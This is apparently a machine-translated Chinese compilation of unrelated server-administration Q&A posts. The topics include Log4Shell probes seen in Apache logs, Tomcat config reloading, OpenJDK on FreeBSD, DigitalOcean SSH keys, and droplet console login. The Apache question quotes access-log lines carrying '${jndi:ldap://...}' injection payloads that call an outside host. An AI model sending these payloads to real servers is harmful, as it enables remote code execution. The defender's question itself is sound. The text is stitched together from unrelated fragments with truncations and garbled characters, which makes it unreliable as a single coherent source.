apache web 服务器 (apache2) 使用 log4j 吗？

我在 Raspberry Pi OS（64 位）上安装了 Apache2 2.4.38（debian），并在日志中发现了一些关于来自（蜜罐/扫描仪）、（离线和恶意？）和（我不知道什么）的CVE-2021-44228的奇怪记录这是）kryptoslogic-cve-2021-44228.comdataastatistics.coma8fvkc.dnslog.cn

我现在应该怎么做？

• 没什么，因为 apache2 不受 CVE-2021-44228 的影响
• 格式化所有内容并等待几天，然后再安装修补版本
• “检查”是否有任何新的 .class 文件以及是否没有继续操作（并使用手动补丁，例如log4j2.formatMsgNoLookups = TRUE
• 别的东西

日志：

139.59.99.80 - - [12/Dec/2021:00:34:47 +0100] "GET / HTTP/1.1" 301 512 "-" "${jndi:ldap://http80useragent.kryptoslogic-cve-2021-44228.com/http80useragent}"
139.59.99.80 - - [12/Dec/2021:00:34:48 +0100] "GET / HTTP/1.1" 200 5932 "http://79.232.126.49/" "${jndi:ldap://http80useragent.kryptoslogic-cve-2021-44228.com/http80useragent}"
139.59.99.80 - - [12/Dec/2021:01:51:38 +0100] "GET /$%7Bjndi:ldap://http80path.kryptoslogic-cve-2021-44228.com/http80path%7D HTTP/1.1" 301 654 "-" "Kryptos Logic Telltale"
139.59.99.80 - - [12/Dec/2021:01:51:39 +0100] "GET /$%7bjndi:ldap:/http80path.kryptoslogic-cve-2021-44228.com/http80path%7d HTTP/1.1" …

我知道.dev顶级域要求所有站点仅支持加密的 HTTPS 连接，不允许任何 HTTP 连接。

是否还有其他此类 TLD？

我编辑了 Tomcat 8conf文件夹中的“server.xml”文件。我Host为一个新网站添加了一个新标签。

我必须重新启动 Tomcat 服务器吗？

我可以让 Tomcat 解析并应用新编辑的server.xml吗？

当我查看我最新的Ports 集合时：

cd /usr/ports/java && ls -d openjdk*

... 我在 OpenJDK 版本中只看到 Java 版本 6、7 和 8：

openjdk6 openjdk6-jre openjdk7 openjdk7-jre openjdk8 openjdk8-jre

? 如何获取和安装Java平台8以后的开源版本？那将是Java 的第9、10、11 或 12 版？最好至少有 11 个，即LTS（长期支持）版本。

自 Java 8 以来，FreeBSD Java® Project页面对任何事情都非常安静。

我知道 Java 有多种来源，例如：

• 蔚蓝系统
• 采用OpenJDK
• Eclipse 的OpenJ9
• IBM
• 甲骨文
• 红帽
• 亚马逊 Corretto

但是这些都没有提供特定于BSD 的版本，我找不到。

在 Linux 上使用 Java？

其中一些来源确实提供了 Linux 版本。Java for Linux 是否可以在使用Linux® 二进制兼容性功能的 …

我刚刚第一次创建了一个虚拟服务器（或者，用 Digital Ocean 主机的语言来说，一个“小滴”）。Digital Ocean 有一个关于 SSH 密钥的说明页面https://www.digitalocean.com/ssh_keys 告诉我们检查 SSH 密钥是否存在，然后它给出了生成新 SSH 密钥然后添加它们的说明。就我而言，使用说明给出的命令，我发现我已经有了 SSH 密钥（我猜是我在注册 github 或 heroku 时生成的）

问题

1) 我应该重用我已经拥有的 SSH 密钥还是生成新的密钥（即它们必须是我使用它们的服务所独有的）？

2) 说明（复制如下）讲的是将 SSH 密钥添加到数字海洋，然后创建服务器。就我而言，我在添加 SSH 密钥之前创建了服务器。这会产生任何我应该注意的问题吗？我应该销毁服务器（还没有安装任何东西）并在适当的时候创建一个添加 SSH 密钥的新服务器吗？

指示

You can add SSH keys to DigitalOcean which can then be selected during the droplet create process to add the selected SSH keys under the root user.

When using SSH keys a root password will no longer be set as SSH keys will be used as …

如何获取 FreeBSD 11.1 中分配给组的用户名列表？

此问题要求提供用户列表或组列表。

此问题询问恰好是多个特定组的成员的用户。

\xe2\x9e\xa5 但是如何简单地询问当前分配给单个特定组的用户列表，例如wheel？

如果可能的话，我更喜欢使用单个命令的解决方案。但如果不可行，脚本将是有用且具有教育意义的。

作为与DigitalOcean上的 Droplet 建立 ssh 连接的替代方法，他们提供了一个“控制台”，即VNC连接，类似于将监视器和键盘插入您的虚拟服务器。

打开这样的控制台窗口时，系统会提示我输入 alogin然后password.

使用 SSH 密钥创建了我的 Droplet 后，我​​不知道login可能是什么，也不知道password可能是什么。

? 如何通过控制台登录到 DigitalOcean 上的 Droplet？

如果这很重要，我的 Droplet 正在运行 FreeBSD 12。

我看过文档页面，如何使用 DigitalOcean Droplet Console 重新获得对 Droplet 的访问权限。该页面确实有一个部分Log In with the Console。但几乎没有给出登录名或密码的解释。它提到：

在登录提示处，输入您要登录的用户。这通常是 root 用户或配置了 sudo 权限的用户。

但是对于我的新 FreeBSD droplet，它root不能用作登录名。

如果我使用该freebsd用户，我会被提示输入密码。没有建立密码，所以Catch-22。

login: freebsd
Password: 
Login incorrect
login:

……然后继续。